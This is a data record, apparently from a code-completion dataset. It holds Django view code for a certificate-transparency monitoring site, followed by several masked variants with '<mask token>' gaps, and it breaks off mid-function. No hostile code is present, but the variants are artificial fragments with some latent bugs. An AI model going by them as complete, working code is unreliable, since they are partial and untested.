with open(os.path.join(BASE_DIR, "static/flags/png/-.png"), "rb") as f:
return HttpResponse(f.read(), content_type="image/png")
def imprint(request):
return render(request, 'observer/imprint.html')
def issues(request):
return render(request, 'observer/issues.html')
def status(request):
status = {'analyzer':{'lastrun':0}, 'monitor':{'lastrun':0}, 'msg':'ok'}
try:
with open('/static/data/status.json', 'r') as f:
status = json.load(f)
status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status['analyzer']['lastrun'])
status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status['monitor']['lastrun'])
except Exception as e:
status['msg'] = "Could not load status file."+str(e)
return render(request, 'observer/status.html', {'status':status})
def certcheck(request):
if request.method == 'POST':
serial_post = request.POST['serial']
sqlQuery = """SELECT id FROM certificate WHERE serial=%s"""
sqlQuery_commonName = """SELECT * FROM ca WHERE """
current_time = str(datetime.datetime.now())
serial_int = int(serial_post, 16)
serial = serial_int.to_bytes((serial_int.bit_length() + 15) // 8, 'big', signed=True) or b'\0'
sqlData = (psycopg2.Binary(serial),)
found_serial = Certificate.objects.raw(sqlQuery, sqlData)
if(found_serial):
return HttpResponse(found_serial)
else:
return HttpResponse("none")
return render(request, 'observer/checkserial.html', {})
|
normal
|
{
"blob_id": "bcc959dcdb60c55897158e85d73c59592b112c12",
"index": 6381,
"step-1": "<mask token>\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. 
sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n 
date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = 
FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = 
paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, 
certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. 
sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n 
date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = 
FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = 
paginator.page(page)\n return render(request, 'observer/log_certs.html', {'log':\n get_object_or_404(CtLog, pk=log_id), 'list_of_entries':\n list_of_entries})\n\n\ndef certs_by_ca(request, ca_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('certificates/1')\n page = int(page)\n ca_id = int(ca_id)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=Certificate.objects.\n filter(issuer_ca=ca_id))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef list_cn_certs(request, cn):\n field_id = 'common name'\n expression = cn\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='commonName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [cn])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 'issues':\n issues})\n\n\ndef list_dnsname_certs(request, dnsname):\n field_id = 'dnsname'\n expression = dnsname\n list_of_certs = Certificate.objects.raw(\n \"SELECT c.ID, c.CERTIFICATE, c.ISSUER_CA_ID, c.SERIAL, c.SHA256, c.NOT_BEFORE, c.NOT_AFTER FROM certificate_identity AS ci JOIN certificate AS c ON ci.CERTIFICATE_ID=c.ID WHERE NAME_TYPE='dNSName' AND reverse(lower(NAME_VALUE))=reverse(lower(%s)) ORDER BY c.NOT_BEFORE ASC\"\n , [dnsname])\n issues = issuefinder.get_all_issues(list(list_of_certs))\n return render(request, 'observer/history.html', {'field_id': field_id,\n 'expression': expression, 'list_of_certs': list_of_certs, 
'issues':\n issues})\n\n\ndef log(request):\n return render(request, 'observer/logs.html', {'list_of_logs': CtLog.\n objects.all().order_by('-is_active', '-latest_entry_id', 'name')})\n\n\ndef cadetail(request, ca_id):\n ca = get_object_or_404(Ca, pk=ca_id)\n number_of_issued_ca = Certificate.objects.filter(issuer_ca=ca_id).count()\n return render(request, 'observer/cadetail.html', {'ca': ca,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\ndef certdetail(request, cert_id=None, cert_sha256=None):\n if cert_sha256:\n cert_sha256_bin = cert_sha256.decode('hex')\n cert = get_object_or_404(Certificate, certificate__sha256=\n cert_sha256_bin)\n if cert_id:\n cert = get_object_or_404(Certificate, pk=cert_id)\n cacert = CaCertificate.objects.filter(certificate_id=cert_id).first()\n digest_sha256 = str(cert.get_digest_sha256()).replace(':', '').lower()[2:-1\n ]\n return render(request, 'observer/certdetail.html', {'certificate': cert,\n 'ca_certificate': cacert, 'keysize_distribution': 'TODO',\n 'digest_sha256': digest_sha256})\n\n\n<mask token>\n\n\ndef logdetail(request, log_id):\n log = get_object_or_404(CtLog, pk=log_id)\n number_of_issued_ca = CtLogEntry.objects.filter(ct_log=log_id).count()\n return render(request, 'observer/logdetail.html', {'log': log,\n 'number_of_issued_ca': number_of_issued_ca})\n\n\n<mask token>\n\n\ndef issues(request):\n return render(request, 'observer/issues.html')\n\n\ndef status(request):\n status = {'analyzer': {'lastrun': 0}, 'monitor': {'lastrun': 0}, 'msg':\n 'ok'}\n try:\n with open('/static/data/status.json', 'r') as f:\n status = json.load(f)\n status['analyzer']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['analyzer']['lastrun'])\n status['monitor']['lastrun'] = datetime.datetime.fromtimestamp(status\n ['monitor']['lastrun'])\n except Exception as e:\n status['msg'] = 'Could not load status file.' + str(e)\n return render(request, 'observer/status.html', {'status': status})\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\n@register.filter\ndef get_item(dictionary, key):\n return dictionary.get(key)\n\n\nclass FastCountQuerySet:\n\n def __init__(self, queryset, tablename):\n self.queryset = queryset\n self.tablename = tablename\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT reltuples FROM pg_class WHERE relname = %s',\n [self.tablename])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, item):\n return self.queryset[item]\n\n\nclass MetadataCountQuerySet:\n\n def __init__(self, queryset, propertyname):\n self.queryset = queryset\n self.propertyname = propertyname\n\n def count(self):\n cursor = connection.cursor()\n cursor.execute('SELECT name_value FROM metadata WHERE name_type = %s',\n [self.propertyname])\n row = cursor.fetchone()\n count = int(row[0])\n cursor.close()\n return count\n\n def __getattr__(self, attr):\n try:\n return object.__getattr__(self, attr)\n except AttributeError:\n return getattr(self.queryset, attr)\n\n def __getitem__(self, key):\n return self.queryset[key]\n\n\ndef index(request):\n metadata = {}\n expired_certs = 0\n active_certs = 0\n total_certs = 0\n total_cas = 0\n messages = []\n if 'subok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Subscription request</strong> - We sent you a confirmation link via email. Click it, and you should be all set.'\n })\n if 'unsubok' in request.GET:\n messages.append({'class': 'alert-info', 'text':\n '<strong>Unsubscription request</strong> - We sent you a confirmation link via email. 
sClick it, and you should be all set.'\n })\n subscribeform = SubscribeUnsubscribeForm()\n with connection.cursor() as c:\n c.execute('SELECT NAME_TYPE, NAME_VALUE FROM metadata')\n rows = c.fetchall()\n for row in rows:\n metadata[row[0]] = row[1]\n return render(request, 'observer/index.html', {'total_certs': metadata[\n 'number_of_certs'], 'total_ca': metadata['number_of_cas'],\n 'total_logs': CtLog.objects.count(), 'active_certs': metadata[\n 'number_of_active_certs'], 'expired_certs': metadata[\n 'number_of_expired_certs'], 'revoked_certs': metadata[\n 'number_of_revoked_certs'], 'misissued_certs': metadata[\n 'number_of_misissued_certs'], 'behaving_cas': metadata[\n 'number_of_correctly_behaving_cas'], 'interesting_cas': metadata[\n 'number_of_interesting_cas'], 'biggest_log': metadata[\n 'number_of_certs_in_biggest_log'], 'biggest_log_name': CtLog.\n objects.get(id=metadata['biggest_log_id']).name, 'smallest_log':\n metadata['number_of_certs_in_smallest_log'], 'uptime_days': (\n timezone.now().date() - datetime.date(2015, 10, 14)).days,\n 'messages': messages, 'subscribeform': subscribeform})\n\n\ndef search(request):\n term = request.GET.get('term', '')\n return render(request, 'observer/search.html', {'term': term})\n\n\ndef caall(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n page = int(page)\n list_of_certs = []\n filtered_qs = CaFilter(request.GET, queryset=Ca.objects.all().order_by(\n 'common_name'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/cas.html', {'list_of_ca':\n list_of_certs, 'filter': filtered_qs})\n\n\ndef certall(request, page=None, ae=None, issuer_ca=None):\n if page == None:\n return HttpResponsePermanentRedirect('all/1')\n ae = request.GET.get('algorithm')\n issuer_ca = request.GET.get('issuer_ca')\n 
date_notbefore = request.GET.get('date_notbefore')\n date_notbefore_gte = request.GET.get('date_notbefore_gte')\n is_active = request.GET.get('is_active')\n date_notafter = request.GET.get('date_notafter')\n date_notafter_lte = request.GET.get('date_notafter_lte')\n page = int(page)\n list_of_certs = []\n filtered_qs = CertFilter(request.GET, queryset=MetadataCountQuerySet(\n Certificate.objects.all().order_by('-id'), 'certificate'))\n paginator = Paginator(filtered_qs.qs, ITEMS_PER_PAGE)\n page = request.GET.get('page')\n query = FastCountQuerySet(Certificate.objects.all().order_by('-id'),\n 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '1' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n not_before__lte=timezone.now(), not_after__gte=timezone.now\n ()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_before__lte\n =timezone.now(), not_after__gte=timezone.now()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active == '0' or is_active == '' or is_active == None:\n if issuer_ca != None and (is_active == None or is_active == ''):\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and (issuer_ca == None or issuer_ca == ''):\n query = 
FastCountQuerySet(Certificate.objects.filter(\n not_after__lte=datetime.date.today()), 'certificate')\n if issuer_ca == '' and is_active == '':\n query = FastCountQuerySet(Certificate.objects.all(), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n if is_active != None and issuer_ca != None:\n query = FastCountQuerySet(Certificate.objects.filter(\n issuer_ca__common_name__contains=issuer_ca, not_after__lte=\n datetime.date.today()), 'certificate')\n paginator = Paginator(query, ITEMS_PER_PAGE)\n try:\n list_of_certs = paginator.page(page)\n except PageNotAnInteger:\n list_of_certs = paginator.page(1)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs, 'filter': filtered_qs})\n\n\n<mask token>\n\n\ndef certexpired(request, page=None, order=None):\n if page == None:\n return HttpResponsePermanentRedirect('expired/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(MetadataCountQuerySet(Certificate.objects.filter(\n not_after__lt=timezone.now()), 'number_of_expired_certs'),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certrevoked(request, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('revoked/1')\n page = int(page)\n list_of_certs = []\n paginator = Paginator(Certificate.objects.filter(id__in=\n RevokedCertificate.objects.all().values('certificate')), ITEMS_PER_PAGE\n )\n if page in paginator.page_range:\n list_of_certs = paginator.page(page)\n return render(request, 'observer/certs.html', {'list_of_certs':\n list_of_certs})\n\n\ndef certs_by_log(request, log_id, page=None):\n if page == None:\n return HttpResponsePermanentRedirect('./1')\n page = int(page)\n log_id = int(log_id)\n list_of_certs = []\n paginator = Paginator(CtLogEntry.objects.filter(ct_log=log_id),\n ITEMS_PER_PAGE)\n if page in paginator.page_range:\n list_of_entries = 
